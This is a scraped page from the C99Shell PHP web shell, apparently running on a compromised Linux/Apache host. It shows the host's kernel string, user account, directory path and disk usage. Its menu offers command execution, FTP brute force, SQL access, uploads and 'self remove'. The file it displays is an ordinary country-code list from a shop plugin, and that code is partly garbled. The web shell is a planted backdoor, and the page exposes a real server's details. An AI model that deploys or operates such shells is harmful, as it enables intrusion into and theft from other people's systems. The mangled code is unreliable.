!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/i18n/   drwxr-xr-x
Free 292.46 GB of 429.69 GB (68.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     continents.php (2.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Continents
 *
 * Returns an array of continents.
 *
 * @package Kkart\i18n
 * @version 2.5.0
 */

defined'ABSPATH' ) || exit;

return array(
    
'AF' => array(
        
'name'      => __'Africa''kkart' ),
        
'countries' => array(
            
'AO',
            
'BF',
            
'BI',
            
'BJ',
            
'BW',
            
'CD',
            
'CF',
            
'CG',
            
'CI',
            
'CM',
            
'CV',
            
'DJ',
            
'DZ',
            
'EG',
            
'EH',
            
'ER',
            
'ET',
            
'GA',
            
'GH',
            
'GM',
            
'GN',
            
'GQ',
            
'GW',
            
'KE',
            
'KM',
            
'LR',
            
'LS',
            
'LY',
            
'MA',
            
'MG',
            
'ML',
            
'MR',
            
'MU',
            
'MW',
            
'MZ',
            
'NA',
            
'NE',
            
'NG',
            
'RE',
            
'RW',
            
'SC',
            
'SD',
            
'SH',
            
'SL',
            
'SN',
            
'SO',
            
'SS',
            
'ST',
            
'SZ',
            
'TD',
            
'TG',
            
'TN',
            
'TZ',
            
'UG',
            
'YT',
            
'ZA',
            
'ZM',
            
'ZW',
        ),
    ),
    
'AN' => array(
        
'name'      => __'Antarctica''kkart' ),
        
'countries' => array(
            
'AQ',
            
'BV',
            
'GS',
            
'HM',
            
'TF',
        ),
    ),
    
'AS' => array(
        
'name'      => __'Asia''kkart' ),
        
'countries' => array(
            
'AE',
            
'AF',
            
'AM',
            
'AZ',
            
'BD',
            
'BH',
            
'BN',
            
'BT',
            
'CC',
            
'CN',
            
'CX',
            
'CY',
            
'GE',
            
'HK',
            
'ID',
            
'IL',
            
'IN',
            
'IO',
            
'IQ',
            
'IR',
            
'JO',
            
'JP',
            
'KG',
            
'KH',
            
'KP',
            
'KR',
            
'KW',
            
'KZ',
            
'LA',
            
'LB',
            
'LK',
            
'MM',
            
'MN',
            
'MO',
            
'MV',
            
'MY',
            
'NP',
            
'OM',
            
'PH',
            
'PK',
            
'PS',
            
'QA',
            
'SA',
            
'SG',
            
'SY',
            
'TH',
            
'TJ',
            
'TL',
            
'TM',
            
'TW',
            
'UZ',
            
'VN',
            
'YE',
        ),
    ),
    
'EU' => array(
        
'name'      => __'Europe''kkart' ),
        
'countries' => array(
            
'AD',
            
'AL',
            
'AT',
            
'AX',
            
'BA',
            
'BE',
            
'BG',
            
'BY',
            
'CH',
            
'CZ',
            
'DE',
            
'DK',
            
'EE',
            
'ES',
            
'FI',
            
'FO',
            
'FR',
            
'GB',
            
'GG',
            
'GI',
            
'GR',
            
'HR',
            
'HU',
            
'IE',
            
'IM',
            
'IS',
            
'IT',
            
'JE',
            
'LI',
            
'LT',
            
'LU',
            
'LV',
            
'MC',
            
'MD',
            
'ME',
            
'MK',
            
'MT',
            
'NL',
            
'NO',
            
'PL',
            
'PT',
            
'RO',
            
'RS',
            
'RU',
            
'SE',
            
'SI',
            
'SJ',
            
'SK',
            
'SM',
            
'TR',
            
'UA',
            
'VA',
        ),
    ),
    
'NA' => array(
        
'name'      => __'North America''kkart' ),
        
'countries' => array(
            
'AG',
            
'AI',
            
'AW',
            
'BB',
            
'BL',
            
'BM',
            
'BQ',
            
'BS',
            
'BZ',
            
'CA',
            
'CR',
            
'CU',
            
'CW',
            
'DM',
            
'DO',
            
'GD',
            
'GL',
            
'GP',
            
'GT',
            
'HN',
            
'HT',
            
'JM',
            
'KN',
            
'KY',
            
'LC',
            
'MF',
            
'MQ',
            
'MS',
            
'MX',
            
'NI',
            
'PA',
            
'PM',
            
'PR',
            
'SV',
            
'SX',
            
'TC',
            
'TT',
            
'US',
            
'VC',
            
'VG',
            
'VI',
        ),
    ),
    
'OC' => array(
        
'name'      => __'Oceania''kkart' ),
        
'countries' => array(
            
'AS',
            
'AU',
            
'CK',
            
'FJ',
            
'FM',
            
'GU',
            
'KI',
            
'MH',
            
'MP',
            
'NC',
            
'NF',
            
'NR',
            
'NU',
            
'NZ',
            
'PF',
            
'PG',
            
'PN',
            
'PW',
            
'SB',
            
'TK',
            
'TO',
            
'TV',
            
'UM',
            
'VU',
            
'WF',
            
'WS',
        ),
    ),
    
'SA' => array(
        
'name'      => __'South America''kkart' ),
        
'countries' => array(
            
'AR',
            
'BO',
            
'BR',
            
'CL',
            
'CO',
            
'EC',
            
'FK',
            
'GF',
            
'GY',
            
'PE',
            
'PY',
            
'SR',
            
'UY',
            
'VE',
        ),
    ),
);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1973 ]--